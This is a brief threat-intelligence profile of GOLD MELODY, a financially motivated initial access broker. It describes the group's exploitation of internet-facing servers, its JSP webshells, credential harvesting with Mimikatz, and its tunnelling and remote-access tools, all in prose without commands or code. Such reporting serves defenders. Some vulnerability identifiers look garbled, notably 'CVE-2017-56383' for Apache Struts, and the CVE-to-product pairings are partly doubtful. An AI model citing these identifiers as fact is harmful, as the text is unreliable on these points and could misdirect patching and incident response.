GOLD MELODY

GOLD MELODY is a financially motivated crime group that has been active since at least 2017. It favors scanning internet-facing servers to identify and exploit vulnerabilities to opportunistically compromise networks.

CTU researchers have observed the group exploiting vulnerabilities in Oracle WebLogic (CVE-2016-0545), Flexera FlexNet ( CVE-2021-4104), and Sitecore (CVE-2021-42237) servers, as well as Apache Struts vulnerability CVE-2017-56383.

The group deploys Java Server Pages (JSP) webshells to maintain persistence on a network. It conducts reconnaissance activity using built-in commands and harvests credentials with the Mimikatz tool. GOLD MELODY uses the Wget free software package to download the 7-Zip archiving tool for defense evasion and data exfiltration. AUDITUNNEL, a reverse proxy tunnelling tool that supports SOCKS5 proxy connections, is used for remote code execution. GOLD MELODY has also been observed using the GOTROJ remote access trojan (RAT).

CTU researchers assess with moderate confidence that GOLD MELODY operates as an initial access broker (IAB), first compromising networks before selling accesses onto other cybercriminal groups.